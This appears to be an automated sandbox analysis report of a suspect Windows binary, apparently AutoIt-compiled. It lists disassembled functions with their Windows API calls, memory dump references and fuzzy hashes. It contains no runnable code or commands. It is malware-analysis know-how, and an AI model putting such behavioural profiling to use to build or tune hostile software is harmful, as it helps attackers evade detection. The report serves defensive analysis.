                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                    • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                    • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                    • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                    Function 0046220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00462258
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                    • IsMenu.USER32(00000000), ref: 004622C3
                    • CreatePopupMenu.USER32 ref: 004622F7
                    • GetMenuItemCount.USER32(000000FF), ref: 00462355
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                    • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                    • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                    • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                    Function 00401765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0040179A
                    • GetWindowRect.USER32(?,?), ref: 004017FE
                    • ScreenToClient.USER32(?,?), ref: 0040181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040182C
                    • EndPaint.USER32(?,?), ref: 00401876
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
                    • Instruction ID: 802354e609c34c5ad38a523f12b28351d49e30531d5e0f2791b792dab913329b
                    • Opcode Fuzzy Hash: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
                    • Instruction Fuzzy Hash: AF418E31100700AFD710EF25C884FAA7BE8EB49724F044A3EFA94962F1C734A945DB6A
                    Function 0048B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(004C57B0,00000000,00BA2928,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B712
                    • EnableWindow.USER32(00000000,00000000), ref: 0048B736
                    • ShowWindow.USER32(004C57B0,00000000,00BA2928,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B796
                    • ShowWindow.USER32(00000000,00000004,?,0048B5A8,?,?), ref: 0048B7A8
                    • EnableWindow.USER32(00000000,00000001), ref: 0048B7CC
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048B7EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                    • Instruction ID: 1d3b34d551e73e97491640bec01ce8c12bc83bc2c135b759935fb039f22faf4f
                    • Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                    • Instruction Fuzzy Hash: 1941A834600340AFDB21DF28C499B9A7BE0FF49310F5845BAF9488F762C735A856CB94
                    Function 0047709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                      • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                    • GetDesktopWindow.USER32 ref: 004770D6
                    • GetWindowRect.USER32(00000000), ref: 004770DD
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                      • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                    • GetCursorPos.USER32(?), ref: 0047713B
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                    • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                    • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                    • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                    Function 00458879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                      • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                      • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                      • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                      • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                    • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                    • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                    • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                    • HeapFree.KERNEL32(00000000), ref: 00458911
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 3008561057-0
                    • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                    • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                    • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                    • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                    Function 004585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                    • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                    • CloseHandle.KERNEL32(00000004), ref: 00458603
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 1413079979-0
                    • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                    • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                    • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                    • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                    Function 0045B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32(00000000), ref: 0045B7B5
                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0045B7C6
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045B7CD
                    • ReleaseDC.USER32(00000000,00000000), ref: 0045B7D5
                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0045B7EC
                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0045B7FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CapsDevice$Release
                    • String ID:
                    • API String ID: 1035833867-0
                    • Opcode ID: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
                    • Instruction ID: ebab011a078b8c66a555392ea924b50fda774449f62ca66a232c327e230173f3
                    • Opcode Fuzzy Hash: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
                    • Instruction Fuzzy Hash: ED018475E00209BBEF109BE69C49A5EBFB8EB48711F00407AFE04A7291D6309C14CF94
                    Function 00420162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                    • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                    • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                    • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                    Function 004653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                    Download Yara Rule
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                    • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                    • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                    • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                    • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                    Function 00467230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                    • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                      • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                    • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                    • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                    • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                    • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                    Function 00458992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                    • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                    • CloseHandle.KERNEL32(?), ref: 004589B2
                    • CloseHandle.KERNEL32(?), ref: 004589BA
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                    • HeapFree.KERNEL32(00000000), ref: 004589CA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                    • String ID:
                    • API String ID: 146765662-0
                    • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                    • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                    • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                    • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                    Function 00457530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                    Download Yara Rule
                    APIs
                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                    • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                    • _memcmp.LIBCMT ref: 00457748
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FromProg$FreeTask_memcmp
                    • String ID: ,,I
                    • API String ID: 314563124-4163367948
                    • Opcode ID: 947aafcc5355d7d4454fef49f7e6cd79d9861281e848203aa0a317f96205b2d7
                    • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                    • Opcode Fuzzy Hash: 947aafcc5355d7d4454fef49f7e6cd79d9861281e848203aa0a317f96205b2d7
                    • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                    Function 004785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00478613
                    • CharUpperBuffW.USER32(?,?), ref: 00478722
                    • VariantClear.OLEAUT32(?), ref: 0047889A
                      • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                      • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                      • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
